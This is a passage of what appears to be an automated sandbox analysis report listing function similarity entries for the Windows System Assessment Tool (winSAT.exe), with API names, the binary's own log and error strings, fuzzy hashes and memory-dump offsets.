                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception$memcpy
                                                                                                                                                                                              • String ID: first not in the string$last < first$last not in the string$pos1 is greater than length()
                                                                                                                                                                                              • API String ID: 3934552184-2820845001
                                                                                                                                                                                              • Opcode ID: 185596fd24bb44a60425fe79720201ac89a48016fbb072915ebaf0910e4a72b6
                                                                                                                                                                                              • Instruction ID: 29294d180896b0ee8bbf1401a8ebf713704760a4c341fc52896f43a0ff48cb28
                                                                                                                                                                                              • Opcode Fuzzy Hash: 185596fd24bb44a60425fe79720201ac89a48016fbb072915ebaf0910e4a72b6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E41A562B1894694EB10FF26E8515EDA321BF50B98FE09032ED0E577E6DE7CE506C360
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLastLibrary$Load$AddressByteFormatFreeGlobalMemoryProcSizeStatus
                                                                                                                                                                                              • String ID: Kernel32.dll$Shlwapi.dll$StrFormatByteSizeEx
                                                                                                                                                                                              • API String ID: 1833532231-3817890669
                                                                                                                                                                                              • Opcode ID: 41c5829ca04459290f6c06ac673fb77b3f0d0e0954c02c68d4063c5228213510
                                                                                                                                                                                              • Instruction ID: 6aed7af76e8775df0ea9153e9a10205760eaa1df306a4cc7dd16411a52a6b7b4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 41c5829ca04459290f6c06ac673fb77b3f0d0e0954c02c68d4063c5228213510
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D514136B19B42CAEB50AB61E85427CB7A0FB49B94FA44634CE0E57794DF38E406C750
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: BuffCharErrorLastLowermodf$CloseCreateFileHandlePathTemp
                                                                                                                                                                                              • String ID: %04d-%02d-%02d-%02d-%02d-%02d-%03d$%s\TempWinSAT-%s-%s.%s
                                                                                                                                                                                              • API String ID: 2799103058-528502101
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Resource$Close$EnabledEventExceptionHandleOpenThrowValue$ConsoleCountCtrlCurrentDirectoryErrorFindFreeHandlerLastLibraryLoadLockModuleMutexProcessQueryReleaseRemoveSizeofStringTickTypeUninitialize_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: $ERROR: user does not have admin rights$PrivateError2
                                                                                                                                                                                              • API String ID: 111406061-3243825390
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$ExceptionOpenThrowValue$ConsoleCtrlDirectoryErrorFreeHandleHandlerLastLibraryMutexQueryReleaseRemoveStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: $PrivateError2$cannot determine if user is running with administrative privileges
                                                                                                                                                                                              • API String ID: 3961399675-2860660824
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$ExceptionOpenThrowValue$ConsoleCtrlDirectoryErrorFreeHandleHandlerLastLibraryMutexQueryReleaseRemoveStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cannot process the command line$Cleanup and exit$ERROR: $PrivateError2
                                                                                                                                                                                              • API String ID: 3961399675-982402892
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$Resource$__uncaught_exception$FindFolderHandleLoadLockModulePathSizeof
                                                                                                                                                                                              • String ID: > Curly Select Local File: '$> Curly: '$> using curly file bypass: '$base\winsat\exe\main.cpp$curlybypass$systemdisk
                                                                                                                                                                                              • API String ID: 423381991-3390790334
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Resource$ConsoleCtrlDirectoryErrorFindHandleHandlerLastLoadLockModuleRemoveSizeofUninitialize__uncaught_exception
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: can't run a formal assessment via a remote session$PrivateError2
                                                                                                                                                                                              • API String ID: 3376348566-3527664938
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Resource$__uncaught_exception$ConsoleCtrlDirectoryErrorFindHandleHandlerLastLoadLockModuleRemoveSizeofUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: can't run a formal assessment on batteries$PrivateError2
                                                                                                                                                                                              • API String ID: 2060722394-1360525213
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Event$CriticalEnabledSectionWrite$CountCurrentEnterFileLeaveProcessTickTransfer_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: %06u (%04u) - %s:%04d:
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
• Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateInstance
                                                                                                                                                                                              • String ID: base\winsat\mlib\mxmldom.cpp$cannot allocate memory for a string$cannot create an IXMLDOMDocument2 document$cannot get the IXMLDOMNode interface for an XML document$cannot load XML data from a string$cannot set the 'preserve white space' flag
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$EnabledEventExceptionOpenThrowValue$ConsoleCountCtrlCurrentDirectoryErrorFreeHandleHandlerLastLibraryMutexProcessQueryReleaseRemoveStringTickTypeUninitialize_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: Failed to determine whether WinSAT was launched by AXE.$PrivateError2
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$ExceptionOpenThrowValue$ConsoleCtrlDirectoryErrorFreeHandleHandlerLastLibraryMutexQueryReleaseRemoveStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$PrivateError2$base\winsat\exe\main.cpp
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$OpenValue_time64
                                                                                                                                                                                              • String ID: Cannot write WinDeploy time to the registry$Cannot write WinDeploy time to the registry: %s$SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinSAT$WindeployTimeDate$base\winsat\exe\main.cpp
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Error$AddressProc$EnabledEventFileLastStatusTime$CountCurrentInitLibraryLoadOpenProcessStopStringSystemTickTraceUnicode_snprintf_s_vsnprintf_smemset
                                                                                                                                                                                              • String ID: > EMD service will be restored on exit.$> Unable to Query and/or configure EMD device: %s$CKCLStart$Modify system policies$WinSAT Kernel Logger$base\winsat\exe\main.cpp
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Open$Event$File$MappingViewmemset
                                                                                                                                                                                              • String ID: WinSAT.SharedMemory$WinSAT.Status.ContinueAssessment$WinSAT.Status.Read$WinSAT.Status.Update
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: fwprintf$_vsnwprintf
                                                                                                                                                                                              • String ID: <ProgrammaticName>%ws</ProgrammaticName>$ <Value>%.$ </MetricValue>$ <MetricValue>$%ws%u%ws$f</Value>
                                                                                                                                                                                              • API String ID: 3023304194-4188047341
                                                                                                                                                                                              • Opcode ID: c388f25eb83d3127818b1145cec6eb266e51844a7b2dd275e847e87368c07379
                                                                                                                                                                                              • Instruction ID: d761bcc2c400be122369e1281a9f3f3088ebad5709eee4a9dd7ad964c7b9cf0f
                                                                                                                                                                                              • Opcode Fuzzy Hash: c388f25eb83d3127818b1145cec6eb266e51844a7b2dd275e847e87368c07379
                                                                                                                                                                                              • Instruction Fuzzy Hash: 87219221A18B85C6EB216B14F8412F5E760FF89B95F909231E94D03724DFBCD14ACB50
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: EnabledEvent$CloseCountCreateCurrentFlushProcessTickValue_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: > Finalized MOOBE key$?$ERROR: could not create MOOBE reg key during finalize. error = %u$MOOBE$SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinSAT$base\winsat\exe\main.cpp
                                                                                                                                                                                              • API String ID: 2380191356-1338865943
                                                                                                                                                                                              • Opcode ID: 4e7d4ff34902cc6fb56b6dde4fc60689389649c15d4046e9215cd57f7fabb79a
                                                                                                                                                                                              • Instruction ID: 1504accde29386f959f67b9ee21b49fc63258a4e2ff634df2bf7808f87e79dc4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e7d4ff34902cc6fb56b6dde4fc60689389649c15d4046e9215cd57f7fabb79a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 23218E72A18A8287EB10AF10E805369BBA0FB99764FE14231D64D07BA4CF7CD545CF10
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc
                                                                                                                                                                                              • String ID: GetLocaleInfoEx$GetLogicalProcessorInformation$GetNumberFormatEx$GetPhysicallyInstalledSystemMemory$SetThreadPreferredUILanguages
                                                                                                                                                                                              • API String ID: 190572456-3523330203
                                                                                                                                                                                              • Opcode ID: 2e105e3c8e4d625950942d553d011b1ce5aee880ee32c86c57c48d5fa7cb8aa5
                                                                                                                                                                                              • Instruction ID: 6a1858c2a68bbb8a885dd648459a486a2eddf2cebb1c99a2f6bdb6857b935843
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e105e3c8e4d625950942d553d011b1ce5aee880ee32c86c57c48d5fa7cb8aa5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 64114236A05F02C2EB04AF51E844074B7A0FF48F55BE99235CA0D8A758EF7CE444CB60
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: memcpy$ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: pos is greater than the string length
                                                                                                                                                                                              • API String ID: 1804175434-1550412204
                                                                                                                                                                                              • Opcode ID: 71ccbfb0a73185a246c9622708f1c48715a6b155ecfb1c04ce32a83dc03d91b0
                                                                                                                                                                                              • Instruction ID: 353920594f395cb8ff6bc196283d3c27ce3a9353e65e894e6d2d0675d3b05417
                                                                                                                                                                                              • Opcode Fuzzy Hash: 71ccbfb0a73185a246c9622708f1c48715a6b155ecfb1c04ce32a83dc03d91b0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5971C062B08A4691EE10EF16D4445BDA325FB94BD8FE49232CA1D077E6EF3CE556C320
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$ByteCharExceptionMultiThrowWide__uncaught_exceptionstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: str is null
                                                                                                                                                                                              • API String ID: 2185001581-2182108151
                                                                                                                                                                                              • Opcode ID: d49090ff22240251b88c13ac0a0cc039a700bd66b209c79e58b28cfff2847ff0
                                                                                                                                                                                              • Instruction ID: 11b07d56de330e46a476c16fc97040b472d2066bab1feac9e3a7376904d95750
                                                                                                                                                                                              • Opcode Fuzzy Hash: d49090ff22240251b88c13ac0a0cc039a700bd66b209c79e58b28cfff2847ff0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D71B462A0CA8182EB20EB16E8503A9F760FF85BA4FA48235EB5D437D5DF7CE405C710
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalSection$CurrentEnabledEnterEventLeaveThread_vsnwprintf_s
                                                                                                                                                                                              • String ID: base\winsat\exe\logging.cpp$can't message is too large$can't message size is invalid$error message is too large
                                                                                                                                                                                              • API String ID: 3495192508-1438449205
                                                                                                                                                                                              • Opcode ID: edc0c6ef16814baa4a118c6c29bc697aab8e79b53554ef59bdb42ca1fc7c25b7
                                                                                                                                                                                              • Instruction ID: 77dbf1a441f097c19a14c89c04d436fa6cc8af80ddfc142827fbae02e07e8f0d
                                                                                                                                                                                              • Opcode Fuzzy Hash: edc0c6ef16814baa4a118c6c29bc697aab8e79b53554ef59bdb42ca1fc7c25b7
                                                                                                                                                                                              • Instruction Fuzzy Hash: B471A432A1CB9185E720EB11E8412AEF7A0FB85760FE08235DA8D43B94DF7CE459CB50
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: __uncaught_exception$CountErrorEventExceptionLastThrowTickmodf
                                                                                                                                                                                              • String ID: $WARNING: could not signal MOOBE event$base\winsat\exe\main.cpp
                                                                                                                                                                                              • API String ID: 4247973475-234416474
                                                                                                                                                                                              • Opcode ID: 7252016752db6b2e790a33a04058fae5569cc5bea63e03143a6e31d6fb33bb93
                                                                                                                                                                                              • Instruction ID: 6319b505640fed88cbfb953cc055b4b1b9d451941c2ca7a1ed42fbb3abc33f3f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7252016752db6b2e790a33a04058fae5569cc5bea63e03143a6e31d6fb33bb93
                                                                                                                                                                                              • Instruction Fuzzy Hash: BA71E732A19A4286EB10EB16D49027DB7A0FFC8B85FA4D136DA4E473A5DF3CE445CB10
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateInstance
                                                                                                                                                                                              • String ID: base\winsat\mlib\mxmldom.cpp$cannot allocate memory for a string$cannot create an IXMLDOMDocument2 document$cannot load XML data from a string$cannot set the 'preserve white space' flag
                                                                                                                                                                                              • API String ID: 542301482-4268812044
                                                                                                                                                                                              • Opcode ID: f908ae71b609c46461057d9872b15e52f061db3af23fc0ec137811ee69d188f1
                                                                                                                                                                                              • Instruction ID: c3f04d8318da516a0c1b5453fdb09b2f942be75170f62f85b0e67235d914528b
                                                                                                                                                                                              • Opcode Fuzzy Hash: f908ae71b609c46461057d9872b15e52f061db3af23fc0ec137811ee69d188f1
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3261823660DB4285E750EF25E840569B7A0FB85B94FA48235EE5E4BBA4CF3DE481C710
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ConsoleCtrlDirectoryErrorHandlerLastMutexReleaseRemoveUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$PrivateError2
                                                                                                                                                                                              • API String ID: 3116941231-3112339584
                                                                                                                                                                                              • Opcode ID: de8a14a2e5652ea44b424f8fc3908815600c830d42e5d1ef7934857c2ca71745
                                                                                                                                                                                              • Instruction ID: 0ffb47b7ee9c93286be2508c1dde9b7bd2197451944415c26d4219e94682c9bc
                                                                                                                                                                                              • Opcode Fuzzy Hash: de8a14a2e5652ea44b424f8fc3908815600c830d42e5d1ef7934857c2ca71745
                                                                                                                                                                                              • Instruction Fuzzy Hash: 56715D61E0D68295FB60BB11F8502BAEB50BF85788FF89035D54E027E6DEACF854C760
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateInstance
                                                                                                                                                                                              • String ID: base\winsat\mlib\mxmldom.cpp$cannot create an IXMLDOMDocument2 document$cannot load document from file '%s'$cannot set the 'preserve white space' flag
                                                                                                                                                                                              • API String ID: 542301482-1638859044
                                                                                                                                                                                              • Opcode ID: 9b3633d7085cfaca965e46358fa46d19c17eb9bc4173e311c048481f6e785c1b
                                                                                                                                                                                              • Instruction ID: cc448c2c6813ea73eaeabb8a40b685108287214e778791ae092fa8171488b686
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9b3633d7085cfaca965e46358fa46d19c17eb9bc4173e311c048481f6e785c1b
                                                                                                                                                                                              • Instruction Fuzzy Hash: A4617332A08B82CAE710EF25E8402A9B7B4FB45B94FA48235EE4D577A4DF3DE445C710
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$ExceptionOpenThrowValue$ConsoleCtrlDirectoryErrorFreeHandleHandlerLastLibraryMutexQueryReleaseRemoveStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$PrivateError2
                                                                                                                                                                                              • API String ID: 3961399675-3112339584
                                                                                                                                                                                              • Opcode ID: 059f1fa61d7c03d0ed93bba0af989d83c1fa4d10aff957910cc3908521c3c790
                                                                                                                                                                                              • Instruction ID: f38248a14245ee041f926c1f2440001e75d7f290dae0ec72cc58d3fb51cd3373
                                                                                                                                                                                              • Opcode Fuzzy Hash: 059f1fa61d7c03d0ed93bba0af989d83c1fa4d10aff957910cc3908521c3c790
                                                                                                                                                                                              • Instruction Fuzzy Hash: CB616E61E0D64295FB60BB11F8502BAEB50BF85748FF89035D94E027E1DEADF454CB60
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$ExceptionOpenThrowValue$ConsoleCtrlDirectoryErrorFreeHandleHandlerLastLibraryMutexQueryReleaseRemoveStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$PrivateError2
                                                                                                                                                                                              • API String ID: 3961399675-3112339584
                                                                                                                                                                                              • Opcode ID: f1742e51f5db6adc76085ef93e44f7734c710560343e0148a6d74f9c8aca2e59
                                                                                                                                                                                              • Instruction ID: d89aca3e01a4d1491ce01bb7fa0b70f931479431272081dfd42e0cf2e9a720a5
                                                                                                                                                                                              • Opcode Fuzzy Hash: f1742e51f5db6adc76085ef93e44f7734c710560343e0148a6d74f9c8aca2e59
                                                                                                                                                                                              • Instruction Fuzzy Hash: DD615C60E0D64295FB60BB11F85027AEB50BF85788FF8A035D94E027E6DEADB454C760
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$ExceptionOpenThrowValue$ConsoleCtrlDirectoryErrorFreeHandleHandlerLastLibraryMutexQueryReleaseRemoveStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$PrivateError2
                                                                                                                                                                                              • API String ID: 3961399675-3112339584
                                                                                                                                                                                              • Opcode ID: a7fc94cc773d67b40326d0184d642366cb8198f9fd3829a4c2515f669bac123f
                                                                                                                                                                                              • Instruction ID: e5e51cefdbe8e04f1bdbd0fa8ca044b02d4167ae315024ef8138c2ff629fdc02
                                                                                                                                                                                              • Opcode Fuzzy Hash: a7fc94cc773d67b40326d0184d642366cb8198f9fd3829a4c2515f669bac123f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F615E60E0D68395FB60BB11F8502BAEB50BF85788FF8A035D94D027E2CEADB454C760
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$ExceptionHandleOpenThrowValue$ConsoleCtrlDirectoryErrorFreeHandlerLastLibraryModuleMutexQueryReleaseRemoveStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$PrivateError2
                                                                                                                                                                                              • API String ID: 868517761-3112339584
                                                                                                                                                                                              • Opcode ID: 48ad5222af03a571fb0f27b28f8fd9c0169d08c4d24b81406f3283c97153d280
                                                                                                                                                                                              • Instruction ID: 98130016f36b84e9d86e6c6361562e3128ec603394b5d55481ecae180f0cdb9c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 48ad5222af03a571fb0f27b28f8fd9c0169d08c4d24b81406f3283c97153d280
                                                                                                                                                                                              • Instruction Fuzzy Hash: DD616D60E0D64395FB60BB11F8502BAEB50BF85788FF8A035D54E027E2DEADB454C761
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$ExceptionOpenThrowValue$ConsoleCtrlDirectoryErrorFreeHandleHandlerLastLibraryMutexQueryReleaseRemoveStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$PrivateError2
                                                                                                                                                                                              • API String ID: 3961399675-3112339584
                                                                                                                                                                                              • Opcode ID: 782be181f8592520a654ec4ba99b35b2eb9fff8b28a7ab140bcd35295ad2ad23
                                                                                                                                                                                              • Instruction ID: 7473f9bc0b22af5bbca3dde12fe0ebae60bed0902aaf184f192a918c41fb1539
